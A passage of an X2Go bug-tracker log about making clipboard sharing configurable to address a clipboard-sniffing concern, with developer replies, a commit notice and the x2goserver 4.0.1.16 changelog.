x2goserver package and make clipboard configurable via  
/etc/x2go/x2goserver.conf. Send a patch to our BTS [1].

The second approach is for us devs, I guess...

The workaround provided by Mike#2 is a fine approach, but not a real  
solution to this problem.

Mike#1

[1] http://wiki.x2go.org/doku.php/wiki:bugs
-- 

DAS-NETZWERKTEAM
mike gabriel, herweg 7, 24357 fleckeby
fon: +49 (1520) 1976 148

GnuPG Key ID 0x25771B31
mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de

freeBusy:
https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
[Message part 2 (application/pgp-signature, inline)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 28 Jan 2014 16:20:01 GMT) (full text, mbox, link).


Acknowledgement sent to Kris Ilowiecki <kril@sourcecap.ch>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 28 Jan 2014 16:20:01 GMT) (full text, mbox, link).


Message #65 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Kris Ilowiecki <kril@sourcecap.ch>
To: x2go-user@lists.berlios.de
Cc: 258@bugs.x2go.org
Subject: Re: [X2Go-User] Limiting clipboard sharing
Date: Tue, 28 Jan 2014 17:11:36 +0100
Hi Mike#1,

On 01/28/2014 04:49 PM, Mike Gabriel wrote:
> There should be two approaches...
>
>   1) disable clipboard server-side for all users
>   2) disable clipboard in X2Go Client / PyHoca-GUI on the client-side
>
> The first is easy. Please look at /usr/bin/x2gostartagent of x2goserver
> package and make clipboard configurable via /etc/x2go/x2goserver.conf.
> Send a patch to our BTS [1].
>

Thank you very much!
The first approach is indeed what is needed in my case.
I will have a look there.

I have been looking through the sources, and my most recent idea was
experimenting with editing /usr/bin/nxagent to run nxagent.bin
with something like "-clipboard no"

I will try the exact approach you are suggesting, though
my bash+awk aren't that good

Many thanks,
Kris

> The second approach is for us devs, I guess...
>
> The workaround provided by Mike#2 is a fine approach, but not a real
> solution to this problem.
>
> Mike#1
>
> [1] http://wiki.x2go.org/doku.php/wiki:bugs


Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 28 Jan 2014 18:15:01 GMT) (full text, mbox, link).


Acknowledgement sent to Krzysztof Ilowiecki <krzysztof.ilowiecki@sourcecap.ch>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 28 Jan 2014 18:15:02 GMT) (full text, mbox, link).


Message #70 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Krzysztof Ilowiecki <krzysztof.ilowiecki@sourcecap.ch>
To: x2go-user@lists.berlios.de
Cc: 258@bugs.x2go.org
Subject: Re: [X2Go-User] Limiting clipboard sharing
Date: Tue, 28 Jan 2014 19:05:49 +0100
On 01/28/2014 05:11 PM, Kris Ilowiecki wrote:
> I have been looking through the sources, and my most recent idea was
> experimenting with editing /usr/bin/nxagent to run nxagent.bin
> with something like "-clipboard no"
>
> I will try the exact approach you are suggesting, though
> my bash+awk aren't that good

just a short update, the crude approach I had tried
(hacking /usr/bin/nxagent) seems to be working.
I just had made the mistake of typing "-clipboard no" instead of
"-clipboard none" or "-clipboard client".

I will have a closer look at editing the x2gostartagent to read 
x2goserver.conf, but I don't know if I'll succeed at this point.

Many thanks,
Kris


Bug 258 cloned as bugs 506, 507, 508, 509 Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Sun, 01 Jun 2014 03:30:01 GMT) (full text, mbox, link).


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#258; Package x2goclient. (Fri, 27 Jun 2014 18:14:20 GMT) (full text, mbox, link).


Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 27 Jun 2014 18:14:20 GMT) (full text, mbox, link).


Message #77 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: 258@bugs.x2go.org
Cc: control@bugs.x2go.org, 507@bugs.x2go.org, 508@bugs.x2go.org
Subject: Make clipboard security choosable from client
Date: Fri, 27 Jun 2014 18:13:17 +0000
[Message part 1 (text/plain, inline)]
clone #258 -1
reassign -1 x2goserver
retitle -1 Provide support in X2Go Server for making clipboard  
security choosable by the client
block #258 by -1
block #507 by -1
block #508 by -1
thanks


Hi all,

I am currently working on making the clipboard modes configurable on  
the X2Go Client side.

Clipboard modes in NX are:

  o c+p in both directions (server->client, client->server)
  o c+p server->client
  o c+p client->server
  o no copy+paste at all

Greets,
Mike
-- 

DAS-NETZWERKTEAM
mike gabriel, herweg 7, 24357 fleckeby
fon: +49 (1520) 1976 148

GnuPG Key ID 0x25771B31
mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de

freeBusy:
https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
[Message part 2 (application/pgp-signature, inline)]

Bug 258 cloned as bug 524 Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Fri, 27 Jun 2014 18:14:22 GMT) (full text, mbox, link).


Bug reassigned from package 'x2goclient' to 'x2goserver'. Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Fri, 27 Jun 2014 18:14:22 GMT) (full text, mbox, link).


Changed Bug title to 'Provide support in X2Go Server for making clipboard' from 'SECURITY: x2goclient allows clipboard sniffing' Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Fri, 27 Jun 2014 18:14:22 GMT) (full text, mbox, link).


Added indication that bug 524 blocks 258 Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Fri, 27 Jun 2014 18:14:22 GMT) (full text, mbox, link).


Added indication that bug 524 blocks 507 Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Fri, 27 Jun 2014 18:14:22 GMT) (full text, mbox, link).


Added indication that bug 524 blocks 508 Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Fri, 27 Jun 2014 18:14:22 GMT) (full text, mbox, link).


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#524; Package x2goserver. (Sat, 28 Jun 2014 22:25:01 GMT) (full text, mbox, link).


Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sat, 28 Jun 2014 22:25:02 GMT) (full text, mbox, link).


Message #94 received at 524@bugs.x2go.org (full text, mbox, reply):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: 524-submitter@bugs.x2go.org
Cc: control@bugs.x2go.org, 524@bugs.x2go.org
Subject: X2Go issue (in src:x2goserver) has been marked as pending for release
Date: Sun, 29 Jun 2014 00:20:11 +0200 (CEST)
tag #524 pending
fixed #524 4.0.1.16
thanks

Hello,

X2Go issue #524 (src:x2goserver) reported by you has been
fixed in X2Go Git. You can see the changelog below, and you can
check the diff of the fix at:

    http://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=6232fbb

The issue will most likely be fixed in src:x2goserver (4.0.1.16).

light+love
X2Go Git Admin (on behalf of the sender of this mail)

---
commit 6232fbb825df7e1538ab1f1ab42fec5b02c50a55
Author: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
Date:   Sun Jun 29 00:18:07 2014 +0200

    Provide support for client-side choice of clipboard security. (Fixes: #524).

diff --git a/debian/changelog b/debian/changelog
index ec15d3d..4384a31 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -46,6 +46,8 @@ x2goserver (4.0.1.16-0x2go1) UNRELEASED; urgency=low
     - Don't die if no session state file is found, as it will break X2Go
       completely after upgrading from versions << 4.0.1.16 if sessions
       are still running/suspended during package upgrade.
+    - Provide support for client-side choice of clipboard security. (Fixes:
+      #524).
   * debian/control, x2goserver.spec:
     + Update versioned D: x2goagent (>= 3.5.0.25). This assures that X2Go
       works with poly-instantiated /tmp directories.


Added tag(s) pending. Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Sat, 28 Jun 2014 22:25:02 GMT) (full text, mbox, link).


Marked as fixed in versions 4.0.1.16. Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Sat, 28 Jun 2014 22:25:02 GMT) (full text, mbox, link).


Message sent on to Christoph Anton Mitterer <calestyo@scientia.net>:
Bug#524. (Sat, 28 Jun 2014 22:25:02 GMT) (full text, mbox, link).


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#524; Package x2goserver. (Thu, 25 Sep 2014 22:45:11 GMT) (full text, mbox, link).


Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 25 Sep 2014 22:45:11 GMT) (full text, mbox, link).


Message #106 received at 524@bugs.x2go.org (full text, mbox, reply):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: 524-submitter@bugs.x2go.org
Cc: control@bugs.x2go.org, 524@bugs.x2go.org
Subject: X2Go issue (in src:x2goserver) has been marked as closed
Date: Fri, 26 Sep 2014 00:42:15 +0200 (CEST)
close #524
thanks

Hello,

we are very hopeful that X2Go issue #524 reported by you
has been resolved in the new release (4.0.1.16) of the
X2Go source project »src:x2goserver«.

You can view the complete changelog entry of src:x2goserver (4.0.1.16)
below, and you can use the following link to view all the code changes
between this and the last release of src:x2goserver.

    http://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=c43b862f2ae0e8980fb7ab5e519d692b07da5a45;hp=98c4f84d83d701823b7887f79d0d9f5ce8233bd4

If you feel that the issue has not been resolved satisfyingly, feel
free to reopen this bug report or submit a follow-up report with
further observations described based on the new released version
of src:x2goserver.

Thanks a lot for contributing to X2Go!!!

light+love
X2Go Git Admin (on behalf of the sender of this mail)

---
X2Go Component: src:x2goserver
Version: 4.0.1.16-0x2go1
Status: RELEASE
Date: Fri, 26 Sep 2014 00:36:32 +0200
Fixes: 122 302 397 406 407 458 468 495 506 511 520 523 524 543 547 558 569 572 573 574 599 605 606 617 619
Changes: 
 x2goserver (4.0.1.16-0x2go1) RELEASED; urgency=low
 .
   [ Mike DePaulo ]
   * New upstream release (4.0.1.16):
     - Make X2Go Server aware of the Openbox desktop environment
       (Command: OPENBOX) (Fixes: #605)
     - Make X2Go Server aware of the IceWM desktop environment
       (Command: ICEWM) (Fixes: #606)
     - Support GNOME Flashback session (GNOME 3.8+) on distro releases such as
       Ubuntu 13.10+ and debian Jessie
       (NOTE: For most users, GNOME Flashback currently will not work.
        This requires that gnome-flashback.session actually be installed. Not
        every Linux distro has it available.
        It also requires that the gnome-session binary not require
        hardware 3D acceleration for said session. Currently, upstream GNOME
        and GNOME 3.8+ in all Linux distros do require this, only 3rd party
        builds do not. See X2Go bug #599 for example.)
       (Thanks Eugene San (eugenesan@gmail.com))
     - Fix launching GNOME 3 Fallback session (GNOME 3.4 & 3.6) on distros other
       than Ubuntu and Debian (Fixes: #599)
     - Fix support for Cinnamon 1.4 (Linux Mint 13) (Fixes: #569)
     - Fix the logic for launching Cinnamon 2.0 and 2.2 (Linux Mint 17).
       (Fixes: #572)
       NOTE: Fixing this bug in x2goserver is not sufficient to make Cinnamon 2.0
       & 2.2 to work properly with X2Go. Bug #150 in nx-libs is still a problem.
       Fixing this bug enables Cinnamon 2.0 and 2.2 to launch to their
       "fallback mode", which has many bugs and missing features when compared to
       "software rendering" mode (cinnamon2d), but is still better than nothing.
   * debian/rules:
     + Improve dh_auto_clean override.
 .
   [ Mike Gabriel ]
   * New upstream version (4.0.1.16):
     - Let x2goversion exit with an error if the X2Go component cannot be
       found.
     - Detect terminated sessions from NX log file. Also interpret a session as
       terminated if terminating just has started.
     - Detect started/starting/resumed/resuming sessions by explicitly scanning
       the NX session log file for those keywords.
     - Interpret NX sessions marked as "aborting session" as (not yet) terminated
       sessions.
     - Provide config option for server-side/global clipboard behaviour in
       x2goagent.options. (Fixes: #506).
     - Be aware of poly-instantiated /tmp directories bind-mounted under
       /tmp-inst. (Fixes: #406).
     - On suspend: Call x2goumount-session before sending SIGHUP to x2goagent.
     - Refuse client communcation if server-side hostname is not set up
       correctly (Fixes: #468).
     - Fix string comparison in x2goumount-session.
     - Fix problems with unmounting shared folders on session suspension/
       termination. Remove extra parentheses from the fusermount execution
       call. (Fixes: #407).
     - Use type -p instead of which in x2goumount-session. Suppress output
       to stdout properly.
     - Use if--then--else--fi during x2goagent resuming in x2goresume-session
       script.
     - More reliably sync the NX session state with the status information in
       the X2Go session DB.
     - x2golistdesktops: Also detect sharable desktop sessions behind abstract
       kernel namespace sockets.
     - Add logcheck rules for X2Go Server. Thanks to Frank Werner for sending
       them in.
     - Correctly use diversions from stderr to stdout in shell commands.
       (Fixes: #520).
     - Don't die if no session state file is found, as it will break X2Go
       completely after upgrading from versions << 4.0.1.16 if sessions
       are still running/suspended during package upgrade.
     - Provide support for client-side choice of clipboard security. (Fixes:
       #524).
     - Use more quotes in x2goruncommand.
     - Detect the exit of rootless applications that forked to background on
       application execution. (Fixes: #122).
     - Make x2goruncommand more robust.
     - Don't fail Xsession startup if any of the profile scripts returns
       with an error.
     - Silently timeout in x2golistdesktops if calls to x2golistsessions and/or
       xwininfo don't produce output within one second. (Fixes: #543).
     - Allow email addresses as login usernames. (Fixes: #573).
     - Abort session startup if env var $USER or $SSH_CLIENT are not set.
       (Fixes: #558).
     - Allow length of username up to 48 characters (was: 32 characters). (Fixes:
       #574).
     - Abort session if env var $HOME is not set or if $HOME contains non-ASCII
       characters. (Fixes: #397).
     - Export XAUTHORITY env var in x2goruncommand to enable privilege upgrade
       for applications started via pkexec. (Fixes: #458).
     - x2gocleansessions: Don't print to stderr if the session state file cannot
       be found. This can happen during session startups. Report to system log
       instead.
     - Don't use Perl package File::ReadBackwards anymore.
     - Fix x2gormforward for 4.0.1.x release series (the X2Go::Log Perl module
       only exists in X2Go Server >= 4.1.0.0, the 4.0.1.x release series has to
       use x2gologlevel.pm in `x2gopath lib`. (Fixes: #617).
     - Pick x2gogetagentstate from 4.1.0.0 release series and adapt to usage
       with X2Go Server 4.0.1.x. (Fixes: #619).
   * debian/control, x2goserver.spec:
     + Update versioned D: x2goagent (>= 3.5.0.25). This assures that X2Go
       works with poly-instantiated /tmp directories.
     + Make sure x2gogetagentstate gets packaged in bin:package x2goserver.
     + Bump Standards: to 3.9.5. No changes needed.
     + Mark x2goserver-pyhoca bin:package as deprecated.
     + Drop D (x2goserver): libfile-readbackwards-perl.
   * x2goserver.spec:
     + Install {libdir}/x2go/x2gormforward into bin:package x2goserver.
     + Drop R (x2goserver): perl(File::ReadBackwards).
 .
   [ Oleksandr Shneyder ]
   * New upstream version (4.0.1.16):
     - x2gostartagent, x2golistsession, x2gosuspend-session and
       x2goresume-session getting agent state from ~/.x2go/C-$SID/state. This
       should help to avoid session damage. Remove nxcleanup. (Fixes: #302,
       #511).
     - Move session file to /tmp/.x2go-$USER. (Fixes: #523).
     - Fix x2gostartagent failures if kbd is not "auto". Remove comma at end of
       options file.
     - Set default value for clipboard to "both" in x2gostartagent and
       x2goresume-session.
     - Clean user SSHD process if connection between server and client lost.
       This should fix error "Global request tcpip-forward failed". (Fixes:
       #495, #547).
 .
   [ Orion Paplowski ]
   * x2goserver.spec:
     + Sync Fedora .spec file with our upstream-provided x2goserver.spec.


Marked Bug as done Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Thu, 25 Sep 2014 22:45:42 GMT) (full text, mbox, link).


Notification sent to Christoph Anton Mitterer <calestyo@scientia.net>:
Bug acknowledged by developer. (Thu, 25 Sep 2014 22:45:43 GMT) (full text, mbox, link).


Message sent on to Christoph Anton Mitterer <calestyo@scientia.net>:
Bug#524. (Thu, 25 Sep 2014 22:45:58 GMT) (full text, mbox, link).


Bug archived. Request was from Debbugs Internal Request <owner@bugs.x2go.org> to internal_control@bugs.x2go.org. (Fri, 24 Oct 2014 05:24:02 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


X2Go Developers <owner@bugs.x2go.org>. Last modified: Thu Nov 21 11:36:49 2024; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.